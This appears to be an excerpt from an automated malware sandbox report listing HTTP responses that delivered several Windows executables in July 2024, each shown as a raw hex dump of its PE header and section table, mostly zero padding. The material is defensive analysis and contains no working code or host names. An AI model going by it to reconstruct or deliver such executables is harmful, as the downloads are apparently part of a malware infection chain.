09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 13 Jul 2024 05:07:11 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "6dde8-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 13 Jul 2024 05:07:12 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "1f3950-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 13 Jul 2024 05:07:13 GMTContent-Type: application/octet-streamContent-Length: 424960Last-Modified: Sun, 16 Jun 2024 06:41:45 GMTConnection: keep-aliveETag: "666e8929-67c00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cc 13 50 4a 88 72 3e 19 88 72 3e 19 88 72 3e 19 d3 1a 3d 18 86 72 3e 19 d3 1a 3b 18 28 72 3e 19 5d 1f 3a 18 9a 72 3e 19 5d 1f 3d 18 9e 72 3e 19 5d 1f 3b 18 fd 72 3e 19 d3 1a 3a 18 9c 72 3e 19 d3 1a 3f 18 9b 72 3e 19 88 72 3f 19 5e 72 3e 19 13 1c 37 18 89 72 3e 19 13 1c c1 19 89 72 3e 19 13 1c 3c 18 89 72 3e 19 52 69 63 68 88 72 3e 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 29 89 6e 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 e4 04 00 00 c6 01 00 00 00 00 00 ea d7 01 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 2c 00 06 00 8c 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 06 00 dc 4b 00 00 90 90 05 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 91 05 00 18 00 00 00 c8 90 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 05 00 cc 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 9a e3 04 00 00 10 00 00 00 e4 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 3a 10 01 00 00 00 05 00 00 12 01 00 00 e8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 ec 65 00 00 00 20 06 00 00 34 00 00 00 fa 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 90 06 00 00 02 00 00 00 2e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 dc 4b 00 00 00 a0 06 00 00 4c 00 00 00 30 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 13 Jul 2024 05:07:13 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "3ef50-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 13 Jul 2024 05:07:14 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "13bf0-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 13 Jul 2024 05:08:52 GMTContent-Type: application/octet-streamContent-Length: 304128Last-Modified: Thu, 11 Jul 2024 22:56:50 GMTConnection: keep-aliveETag: "66906332-4a400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 1c aa d7 91 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 d0 02 00 00 d0 01 00 00 00 00 00 e2 9f 02 00 00 20 00 00 00 00 03 00 00 00 40 00 00 20 00 00 00 04 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 05 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 90 9f 02 00 4f 00 00 00 00 00 03 00 cc c9 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 04 00 0c 00 00 00 74 9f 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c8 cf 02 00 00 20 00 00 00 d0 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 cc c9 01 00 00 00 03 00 00 cc 01 00 00 d4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 e0 04 00 00 04 00 00 00 a0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 13 Jul 2024 05:09:01 GMTContent-Type: application/octet-streamContent-Length: 550912Last-Modified: Fri, 12 Jul 2024 08:28:21 GMTConnection: keep-aliveETag: "6690e925-86800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 41 fd 6e b8 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 30 00 00 ac 02 00 00 ba 05 00 00 00 00 00 de ca 02 00 00 20 00 00 00 e0 02 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 08 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 84 ca 02 00 57 00 00 00 00 e0 02 00 62 b6 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 08 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e4 aa 02 00 00 20 00 00 00 ac 02 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 62 b6 05 00 00 e0 02 00 00 b8 05 00 00 ae 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 08 00 00 02 00 00 00 66 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 ca 02 00 00 00 00 00 48 00 00 00 02 00 05 00 ac a0 01 00 d8 29 01 00 09 00 00 00 45 03 00 06 0c 82 01 00 a0 1e 00 00 50 20 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 